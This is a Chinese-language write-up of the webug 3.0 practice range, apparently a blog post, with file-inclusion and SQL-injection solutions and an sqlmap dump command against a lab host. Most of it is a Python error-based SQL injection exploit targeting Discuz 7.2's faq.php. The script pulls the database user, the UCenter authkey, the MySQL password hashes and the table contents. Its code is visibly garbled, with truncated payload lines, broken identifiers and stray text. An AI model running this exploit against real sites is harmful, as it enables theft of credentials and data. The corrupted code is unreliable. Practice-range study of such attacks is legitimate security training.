webug靶场3.0(中级进阶)
webug靶场3.0(中级进阶)
第⼀题:出来点东西吧
题⽬类型:⽂件包含
使⽤⼯具:⼿⼯
1. 根据题⽬描述猜测本题是考察⽂件包含漏洞。点击题⽬中的“Go”时没有反映,查看源码果然是代码出现了问题,对代码进⾏以下修改恢复正常。<?php
if( $_GET )
{
$file=$_GET['country'];
require_once "$file";
}
>
修改为:
<?php
if( $_GET )
{
$file=$_GET['country'];
require_once "\\cc\\"."$file";
}
>
修改后访问效果如下:
2. 题⽬描述中给出了**…/…/etc/passwd**路径提⽰,可是虚拟机是Windows系统不可能存在上述⽬录。应该是作者题⽬没有完善,那就访问点其他什么吧,⽐如图⽚信息。
第⼆题:pass
题⽬类型:⽂件包含
使⽤⼯具:⼿⼯
1. 和上⼀题⼀样同样是⽂件包含漏洞,只不过这次的提交⽅式为POST
2. 使⽤代理,修改此提交参数即可。
3. 当然上述两题都看了源码所以很容易确定相对路径,现实中可以利⽤等⼯具进⾏⾃动化测试。
第三题:怎么⼜TM注⼊
题⽬类型:注⼊
使⽤⼯具:Modify Headers
1. 题⽬给的很明确,这有是⼀道注⼊类型的题,接下来的关键就是注⼊点了。页⾯中没有位置输⼊,URL中也没有参数,看了⼀下Cookie也没有内容,不会有是头部注⼊吧。
2. 试了下基础⾥⾯曾经⽤到的X-Forwarded-For头部参数没发现异常,没有继续猜下去查看源码,原来是HOST头部参数存在注⼊,过程和渗透基础中的头部注⼊过程相同。Modify Headers插件设
置和结果如下所⽰:
第四题:看看APK
题⽬类型:逆向
使⽤⼯具:apktool
不会
第五题:时间注⼊
题⽬类型:注⼊
使⽤⼯具:SQLMAP
1. ⾸先设计⼀个时间盲注的payload测试下是否为时间盲注,当猜测长度为12时出现明显延迟,可以判断是存在盲注的。
2. 题⽬提⽰此注⼊类型为基于时间的盲注,盲注过程复杂要经过多次尝试,⼲脆直接⽤⼯具。在终端输⼊下述命令:
sqlmap -u 192.168.6.128/pentest/test/time/index.php?type= -p type -D pentesterlab -T flag --dump
3. 结果如下所⽰:
4. 查看源码后发现并不需要时间注⼊,可以使⽤如下payload:
第六题:注⼊
题⽬类型:基于错误的注⼊
使⽤⼯具:Python
1.
2.
3.
4. 代码如下:
#!/usr/bin/env python
#coding:utf-8
import urllib
import requests
import re
import sys
import argparse
from prettytable import PrettyTable
CU = False
CD = False
UK = False
PW = False
SC = False
TB = False
CL = False
DP = False
DB = None
DBN = None
TBL = None
TBLN = None
COL = None
URL= None
def parse_argvs():
global CU,CD,UK,PW,SC,TB,CL,DP,DB,DBN,TBL,TBLN,COL,URL
parser = argparse.ArgumentParser(description='Designed for DZ7.2')
parser.add_argument('--current-user',help='Retrieve DBMS current user',action='store_true')
parser.add_argument('--current-db',help='Retrieve DBMS current database',action='store_true')
parser.add_argument('--uc-key',help='Retrieve uc-key',action='store_true')
parser.add_argument('--password',help='Enumerate DBMS users password hashes',action='store_true')
parser.add_argument('--schemas',help='Enumerate DBMS database schemas',action='store_true')
parser.add_argument('--tables',help='Enumerate DBMS database tables',action='store_true')
parser.add_argument('--columns',help='Enumerate DBMS database table columns',action='store_true')
parser.add_argument('--dump',help='Dump DBMS database table entries',action='store_true')
parser.add_argument('-D',help='DBMS database to enumerate',action='store',metavar='id:datatabase')
parser.add_argument('-T',help='DBMS database table to enumerate',action='store',metavar='id:table_name')
parser.add_argument('-C',help=' DBMS database table column(s) to enumerate',action='store',metavar='')
parser.add_argument('-U',help=' DBMS database table column(s) to enumerate',action='store',metavar='URL',required=True)
args = parser.parse_args(sys.argv[1:])
CU = args.current_user
CD = args.current_db
UK = args.uc_key
PW = args.password
SC = args.schemas
TB = args.tables
CL = lumns
DP = args.dump
if args.D:
DB,DBN = args.D.split(':')
if args.T:
TBL,TBLN = args.T.split(':')
COL = args.C
URL = args.U
def sendRequest(para):
para = urllib.urlencode(para)
try:
res = (URL+'/faq.php',para,headers={'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201'})
except:
print'Can not connect to target!'
exit(0)
def GetCurrentUser():
print'Start getting '
para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
res = sendRequest(para)
cu=re.findall("Duplicate entry '(.*?)'",res)
if len(cu)==0:
print'Exploit Failed!'
return
print'Current User:%s'%cu[0][:-1]
def GetCurrentDB():
print'Start getting '
para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
res = sendRequest(para)
database=re.findall("Duplicate entry '(.*?)'",res)
if len(database)==0:
print'Exploit Failed!'
return
print'Current Database:%s'%database[0][:-1]
def GetUcKey():
print'Start getting '
para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,1,62) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables grou para1={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,63,2) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables gro res=sendRequest(para);
res1=sendRequest(para1);
key1=re.findall("Duplicate entry '(.*?)'",res)
key2=re.findall("Duplicate entry '(.*?)'",res1)
if len(key1)==0:
print'Get Uc_Key Failed!'
return
key=key1[0][:-1]+key2[0][:-1]
print'uc_key:%s'%(key)
def GetUserPW():
print'Start getting user '
count = 0
while True:
para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select concat(user,0x20,password) from mysql.user limit %d,1),floor(rand(0)*2))x from information_schema.tables gr res=sendRequest(para);
user_list=re.findall("Duplicate entry '(.*?)'",res)
if len(user_list)==0:
print'Dump Done!'
break
user=user_list[0].split('')
print'User info: user:%s password:%s'%(user[0][:-1],user[1][:-1])
count += 1
def DumpSchema():
print'Start '
count = 0
paras = ') and (select 1 from (select count(*),concat(0x5e,(select schema_name from INFORMATION_SCHEMA.SCHEMATA limit %d,1),0x5e,floor(rand(0)*2))x from information_schema.tables group by x)a)#'
table = PrettyTable(['id','schema_name'])
while True:
para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':paras%count}
res=sendRequest(para);
tn=re.findall("Duplicate entry '\^(.*?)\^\d'",res);
if len(tn)==0:
print'Dump Done!'
break
table.add_row([count,tn[0]])
count+=1
print table
def DumpTableNames():
print'Start dumping '
count = 0
paras = ') and (select 1 from (select count(*),concat(0x5e,(select hex(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where table_schema=(select schema_name from INFORMATION_SCHEMA.SCHEMATA limit % table = PrettyTable(['id','table_name'])
while True:
para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':paras%count}
res=sendRequest(para);
tn=re.findall("Duplicate entry '\^(.*?)\^\d'",res);
if len(tn)==0:
print'Dump Done!'
break
table_name=tn[0].decode('hex')
table.add_row([count,table_name])
count+=1
print table
def DumpTableColumns():
print'Start dumping '
count = 0
paras = ') and (select 1 from (select count(*),concat(0x5e,(select column_name from INFORMATION_SCHEMA.COLUMNS where table_name=(select TABLE_NAME from INFORMATION_SCHEMA.TABLES where table_s table = PrettyTable(['column_name'])
while True:
para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':paras%count}
res=sendRequest(para);
pre=re.findall("Duplicate entry '\^(.*?)\^\d'",res);
if len(pre)==0:
print'Dump Done!'
break
table.add_row([pre[0]])
count+=1
print table
def DumpData():
print'Start '
count = 0
table = PrettyTable(COL.split(','))
columns = place(',',',0x20,')
paras = ') and (select 1 from (select count(*),concat((select concat(%s) from %s'%(columns,DBN+'.'+TBLN)+' limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'
while True:
para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':paras%count}
res=sendRequest(para);
datas=re.findall("Duplicate entry '(.*?)'",res)
if len(datas)==0:
print'Dump Done!'
break
cleandata=datas[0][:-1]
info=cleandata.split('')
table.add_row(info)
count+=1
print table
if__name__ == '__main__':
parse_argvs()
if CU:
GetCurrentUser()
if CD:
GetCurrentDB()
if UK:
GetUcKey()
if PW:
GetUserPW()
if SC:
DumpSchema()
if TB:
if DB:
DumpTableNames()
else:
print"Please specify database id and name"
if CL:
if DB:
if TBL:
DumpTableColumns()
else:
print"Please specify table id and name"
else:
print"Please specify database id and name"
if DP:
if DBN:
if TBLN:
if COL:
DumpData()
else:
print"Please specify columns"
else:
print"Please specify table id and name"
else:
asp查看源码配置uiprint"Please specify database id and name"
第七题:ASPCMS
题⽬类型:SQL注⼊
使⽤⼯具:OWASP Mantra
1. 在做这道题时需要⾃⼰配置下环境,⾸先需要⾃⾏配置好虚拟机的IIS服务器,具体参考这篇⽂章
2. 配置完成后将⽬录C:\phpStudy\WWW\pentest\cms\aspcms\AspCms2.0.1GB2312中的所有⽂件复制到配置好的IIS服务器的根⽬录下就可以了。
3. 需要说明的是由于phpStudy已经占⽤了80端⼝,所以在配置IIS服务器时需要将端⼝改为其他端⼝,我将其指定为了8081端⼝,如下:
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论